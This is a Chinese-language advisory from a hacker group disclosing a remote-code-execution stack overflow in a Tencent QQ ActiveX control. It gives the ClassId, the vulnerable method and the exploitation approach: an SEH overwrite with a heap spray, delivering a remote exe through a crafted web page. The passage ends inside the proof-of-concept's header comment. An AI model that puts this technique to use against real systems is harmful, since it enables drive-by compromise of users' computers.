by axis(axis_at_ph4nt0m.org)

　　摘要:

　　QQ是由Tencent公司开发的一个IM软件，在中国有着非常广泛的用户。

　　DSW Avert在200612.31发现了QQ的几个0day漏洞，并通知了QQ官方。QQ在2007.1.1进行了升级。事实上，在此之前，幻影旅团 (ph4nt0m)的axis就已经发现了这些漏洞，出于一些原因未曾公布，现在漏洞被公开了，所以将细节和可利用的POC公布如下：

　　QQ的这几个漏洞，均是由于Activex Control造成的，相关dll分别是：VQQPLAYER.OCX,VQQsdl.dll,V2MailActiveX.ocx

　　其中有一个成功利用后，将可远程控制用户电脑，因为是activex的，所以只需要用户安装过QQ，甚至不需要其登录，就可以成功利用。

　　另外几个漏洞分别是拒绝服务漏洞，不可执行,在此不再赘述。

　　影响版本:

　　Tencent QQ2006正式版及之前所有版本。(未升级2007.1.1补丁)

　　细节:

　　在VQQPLAYER.OCX中，由于程序员的粗心，存在一个栈溢出漏洞，在函数返回时，可以控制EIP。

　　漏洞存在的Method是LaunchP2PShare,

　　ClassId是{AC3A36A8-9BFF-410A-A33D-2279FFEB69D2}

　　其原型是：

　　[id(0x00000030)]

　　VARIANT_BOOL LaunchP2PShare(

　　BSTR szExeName,

　　long nDuration);

　　第一个参数没有进行长度检查，为超长字符串时，将造成一个栈溢出。

　　幻影旅团将对此发布一个POC代码，请勿将此作为非法用途

　　POC:

　　------------------------------------------

　　/*

　　*-----------------------------------------

　　*

　　* Tencent QQ VQQPlayer.ocx (all version) 0day

　　*

　　*

　　* Author: axis

　　* Date: 2006-12-27

　　* Mail: axis@ph4nt0m.org

　　*

　　* Bug discovered by axis@ph4nt0m.org

　　* :

　　* :

　　* :

　　* :

　　* :Usage: filename [htmlfile]

　　* : filename.exe site.com/file.exe localhtml.htm

　　*

　　* 在VQQPlayer.ocx中的LaunchP2PShare函数的第一个参数没有做边界检查，超长将在MFC42.dll覆盖到eip和seh

　　* QQ是vc6编译的，所以可以用覆盖返回地址的方法，不过要求覆盖eip和以前的是可见字符，要求比较苛刻

　　* 而且覆盖返回地址的方法，和QQ安装路径有关，因为是这样覆盖起 c:program files encentqqAAAAA....

　　* 覆盖seh方法比较通用，使用heap spray的方法，跳到0x0c0c0c0c中去执行shellcode，但是会关闭ie。